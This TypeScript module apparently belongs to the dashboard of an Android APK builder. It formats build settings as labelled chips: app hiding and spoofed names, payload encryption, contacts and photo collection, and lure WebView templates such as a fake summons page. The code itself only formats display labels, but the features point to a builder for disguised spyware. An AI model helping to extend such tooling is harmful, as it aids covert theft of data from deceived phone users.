import type { IBuild } from '@/entities/build.entity';
import { formatApkSize } from '@/lib/format-apk-size';
import {
	isPostPermissionRedirectMode,
	POST_PERMISSION_REDIRECT_LABELS,
	type PostPermissionRedirectMode,
} from '@crave/config/post-permission-redirect';
import { resolveApkHidingChipLabel } from '@crave/config/apk-hiding';
import { isWebviewTemplateId, type WebviewTemplateId } from '@crave/config/webview-templates';

export type BuildSettingChip = {
	key: string;
	label: string;
	enabled: boolean;
};

export type BuildSettingUrl = {
	key: string;
	href: string;
};

const WEBVIEW_CHIP_LABEL: Record<WebviewTemplateId, string> = {
	custom: 'WebView кастом',
	photo: 'WebView фото',
	video: 'WebView видео',
	video_sound: 'WebView видео со звуком',
	court: 'WebView повестка',
	loading: 'WebView загрузка',
};

const PLACEHOLDER_APPLICATION_ID = 'zero';

export function getBuildSettingChips(build: Pick<
	IBuild,
	| 'pushEnabled'
	| 'contactsEnabled'
	| 'photosEnabled'
	| 'webviewType'
	| 'postPermissionRedirect'
	| 'domainHostname'
	| 'apkHidingMethod'
	| 'spoofPreset'
	| 'spoofCustomName'
	| 'payloadEncryptEnabled'
>): BuildSettingChip[] {
	const redirectMode = resolveRedirectMode(build.postPermissionRedirect);
	const chips: BuildSettingChip[] = [
		{
			key: 'apk-hiding',
			label: resolveApkHidingChipLabel(build.apkHidingMethod, build.spoofPreset, build.spoofCustomName),
			enabled: build.apkHidingMethod !== 'full',
		},
		build.pushEnabled === false
			? { key: 'push', label: 'Push выкл', enabled: false }
			: { key: 'push', label: 'Push вкл', enabled: true },
		build.contactsEnabled === false
			? { key: 'contacts', label: 'Контакты выкл', enabled: false }
			: { key: 'contacts', label: 'Контакты вкл', enabled: true },
		build.photosEnabled === true
			? { key: 'photos', label: 'Фото AI вкл', enabled: true }
			: { key: 'photos', label: 'Фото AI выкл', enabled: false },
	];

	if (build.payloadEncryptEnabled === true) {
		chips.push({ key: 'payload-encrypt', label: 'Двойное шифрование', enabled: true });
	}

	chips.push(
		webviewChip(build.webviewType),
		{
			key: 'redirect',
			label: POST_PERMISSION_REDIRECT_LABELS[redirectMode],
			enabled: redirectMode !== 'none',
		},
	);

	const hostname = build.domainHostname?.trim();
	if (hostname) {
		chips.push({ key: 'domain', label: hostname, enabled: true });
	}

	return chips;
}

export function getBuildSettingUrls(build: Pick<
	IBuild,
	'webviewType' | 'url' | 'postPermissionRedirect' | 'postPermissionRedirectUrl'
>): BuildSettingUrl[] {
	const urls: BuildSettingUrl[] = [];
	const customWebviewUrl = build.webviewType === 'custom' ? build.url?.trim() : '';
	if (customWebviewUrl) {
		urls.push({ key: 'webview', href: customWebviewUrl });
	}

	const redirectMode = resolveRedirectMode(build.postPermissionRedirect);
	const redirectUrl = build.postPermissionRedirectUrl?.trim();
	if (redirectMode === 'custom_url' && redirectUrl) {
		urls.push({ key: 'redirect', href: redirectUrl });
	}

	return urls;
}

export function getBuildTechParts(
	build: Pick<IBuild, 'applicationId' | 'protocolVersion' | 'successBuilded' | 'hasEncryptApk' | 'hasRawApk' | 'apkSize' | 'rawApkSize'>,
): string[] {
	const parts: string[] = [];
	const applicationId = build.applicationId?.trim();
	if (applicationId && applicationId !== PLACEHOLDER_APPLICATION_ID) {
		parts.push(applicationId);
	}
	if (typeof build.protocolVersion === 'number' && Number.isFinite(build.protocolVersion)) {
		parts.push(`protocol ${build.protocolVersion}`);
	}

	if (build.successBuilded) {
		const encryptSize = formatApkSize(build.hasEncryptApk ? build.apkSize : null);
		const rawSize = formatApkSize(build.hasRawApk ? build.rawApkSize : null);
		if (encryptSize && rawSize) {
			parts.push(`Encrypt ${encryptSize}`, `Raw ${rawSize}`);
		} else {
			const singleSize = encryptSize ?? rawSize ?? formatApkSize(build.apkSize);
			if (singleSize) {
				parts.push(encryptSize ? `Encrypt ${singleSize}` : rawSize ? `Raw ${singleSize}` : singleSize);
			}
		}
	}

	return parts;
}

function webviewChip(webviewType: IBuild['webviewType']): BuildSettingChip {
	if (!webviewType) {
		return { key: 'webview', label: 'WebView выкл', enabled: false };
	}
	if (isWebviewTemplateId(webviewType)) {
		return { key: 'webview', label: WEBVIEW_CHIP_LABEL[webviewType], enabled: true };
	}
	return { key: 'webview', label: `WebView ${webviewType}`, enabled: true };
}

function resolveRedirectMode(mode: IBuild['postPermissionRedirect']): PostPermissionRedirectMode {
	if (mode && isPostPermissionRedirectMode(mode)) {
		return mode;
	}
	return 'none';
}
